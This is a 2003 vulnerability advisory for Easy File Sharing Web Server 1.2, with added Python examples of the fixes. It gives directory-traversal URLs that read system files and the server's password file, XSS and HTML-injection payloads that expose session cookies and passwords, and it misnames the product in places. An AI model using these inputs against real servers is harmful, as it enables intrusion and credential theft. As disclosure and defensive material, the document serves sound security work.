
easyfile.txt

Posted Sep 16, 2003
Authored by Dr. Insane

Easy File Sharing Web Server 1.2 is vulnerable to directory traversal bugs, cross site scripting, HTML injection, and password disclosure because passwords are left in the clear.

tags | exploit, web, xss
SHA-256 | f44612ef4731652eedc76c34971ccef6fbab01c107847e6496e2fa6d924e38f8

Advisory for Easy File Sharing web server 1.2...

---

------------------------------------------------------------------
Easy File Sharing Web Server 1.2

------------------------------------------------------------------
-= by Dr_insane (dr_insane@pathfinder.gr) =-



Product:
--------
Easy File Sharing Web Server 1.2


Vulnerability(s):
-----------------
1. Directory Traversal Bugs
2. XSS vulnerabilities
3. HTML Injection
4. Passwords in clear text

Description of product:
-----------------------
Easy File Sharing Web Server is a file sharing system that allows visitors to upload/download files easily through a web browser (IE, Netscape, Opera etc.). It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs. They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (BBS, Forum). It allows remote users to post messages and files to the forum.


VULNERABILITY / EXPLOIT
=======================
There are multiple vulnerabilities in Postnuke Easy File Sharing Web Server 1.2, as described below.

1. Directory traversing

Easy File Sharing Web Server has a directory traversal vulnerability. Using the string '../' in a URL, an attacker can gain read access to any file outside of the intended web-published filesystem directory.

There is not much to expand on this one....

Example:
http://127.0.0.1/../../../autoexec.bat to show autoexec.bat
http://127.0.0.1/.../.../.../program files/Easy File Sharing Web Server/users.sdb get the server password file

Also:
http://127.0.0.1/msg.ghp?forumid=4&id=/../../../../../../../../windows/win.ini
http://127.0.0.1/msg.ghp?forumid=/../../../../../../../../windows/win.ini

etc etc etc
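The check a server needs before mapping a URL to a file, shown as an added example (not part of the original advisory and not the vendor's code). It covers both forms listed above: dot-only path segments such as '../' and '.../', and path text passed in the forumid/id parameters. The function names and the numeric-ID rule are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

class RejectedRequest(ValueError):
    """The request must not be mapped to a file on disk."""

def safe_relative_path(raw_path):
    """Decode once, then return a path relative to the web root or raise."""
    decoded = unquote(raw_path)
    if "\x00" in decoded:
        raise RejectedRequest("NUL byte in path")
    clean = []
    for seg in decoded.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue  # empty or current-directory segment: drop it
        if seg.strip(" .") == "":
            # '..', '...', '.. ' and similar: never resolve, always refuse
            raise RejectedRequest("dot-only segment %r" % seg)
        if ":" in seg:
            raise RejectedRequest("drive letter or stream in %r" % seg)
        clean.append(seg)
    return "/".join(clean)

NUMERIC_ID = re.compile(r"[0-9]{1,9}")  # assumed: forum and message IDs are integers

def check_request(url):
    """Validate the path and the forumid/id parameters; return the safe path."""
    parts = urlsplit(url)
    rel = safe_relative_path(parts.path)
    query = parse_qs(parts.query, keep_blank_values=True)
    for name in ("forumid", "id"):
        for value in query.get(name, []):
            if not NUMERIC_ID.fullmatch(value):
                raise RejectedRequest("%s must be numeric" % name)
    return rel

def is_allowed(url):
    try:
        check_request(url)
        return True
    except RejectedRequest:
        return False

if __name__ == "__main__":
    # Constructed sample: one benign request and one request from the advisory.
    for u in ("http://127.0.0.1/msg.ghp?forumid=4&id=12",
              "http://127.0.0.1/../../../autoexec.bat"):
        print(is_allowed(u), u)
```

The returned relative path is what gets joined to the web root; a rejected request should produce an error response and a log entry rather than a silently "cleaned" path.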

2. XSS vulnerabilities

A vulnerability exists in the Easy File Sharing Web Server that involves incorrect filtering of server signature data. The vulnerability could enable an attacker to hijack web sessions, allowing a range of potential compromises on the targeted host.

The vulnerable URLs are:

http://127.0.0.1/newmsg.ghp?forumid=1 Insert Evil javascript code in "Your message field"

The following URL will demonstrate the attack:

Some browsers submit the malicious host header when parsing this request:
Host: <img src="" onerror="alert(document.cookie)">

For example, if we supply this code: <script>alert(document.cookie)</script> we will get:

TEMPLATE:standard;LANG=english; TOKEN:121234122; TOKEN_1=34123123; SHOW_FEATURES=0; db_pass; db_user; SESSIONID=1172; UsserID:dr_insane; PassWD=passtest1111

It is possible for someone to get the username and the password. In our example
the username is: dr_insane and the password: passtest1111

3. HTML Injection

Any user can inject HTML code when creating a new post.
The bug is in the post icon:

<img src="icon.gif" etc.>
If you create a personalized form with this code: icon.gif">
<script>alert('bug');<script><anytag="
the final code of the post icon is:
<img src="icon.gif"><script>alert('bug');<script><anytag="" etc.>
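The fix for sections 2 and 3, shown as an added example (not part of the original advisory and not the vendor's code): the post icon is checked against an allow-list pattern, both the attribute and the message body are HTML-escaped on output, and the session cookie carries only a random token marked HttpOnly instead of a user name and password. The template shape, function names and icon naming rule are assumptions; the two payload strings are the ones quoted in the advisory.

```python
import html
import re
import secrets
from http.cookies import SimpleCookie

ICON_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}\.gif")  # assumed icon naming rule
DEFAULT_ICON = "icon.gif"

def render_post_unsafe(icon, message):
    # Assumed shape of the flawed template: raw string concatenation, so a
    # double quote in `icon` closes the src attribute and starts new markup.
    return '<img src="' + icon + '"><p>' + message + "</p>"

def render_post(icon, message):
    # 1. Input validation: an icon that is not a plain file name is replaced.
    if not ICON_NAME.fullmatch(icon):
        icon = DEFAULT_ICON
    # 2. Output encoding: escape for the context (attribute value, element body).
    return '<img src="%s"><p>%s</p>' % (
        html.escape(icon, quote=True),
        html.escape(message, quote=True),
    )

def session_cookie_header():
    # The cookie holds an opaque random token only; HttpOnly keeps it out of
    # document.cookie, so injected script cannot read it.
    cookie = SimpleCookie()
    cookie["SESSIONID"] = secrets.token_urlsafe(32)
    cookie["SESSIONID"]["httponly"] = True
    cookie["SESSIONID"]["samesite"] = "Strict"
    return cookie["SESSIONID"].OutputString()

# Inputs quoted in the advisory, used here as test data for the renderer.
ICON_INPUT = "icon.gif\"><script>alert('bug');<script><anytag=\""
MESSAGE_INPUT = "<script>alert(document.cookie)</script>"

if __name__ == "__main__":
    print("unsafe:", render_post_unsafe(ICON_INPUT, MESSAGE_INPUT))
    print("safe:  ", render_post(ICON_INPUT, MESSAGE_INPUT))
    print("cookie:", session_cookie_header())
```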

4. Passwords in clear text

A vulnerability has been identified in Enceladus Server suite allowing malicious, local users to see usernames and passwords.

The problem is that usernames and passwords for the server are stored in clear text in the folder "users.sdb".


Local:
------
Yes

Remote:
-------
We can 0wn the server via remote!


Credits:
--------
Dr_insane
dr_insane@pathfinder.gr , dr_insane@hack.gr
Http://members.lycos.co.uk/r34ct/








----------------------------
Dr_Insane
members.lycos.co.uk/r34ct/
----------------------------
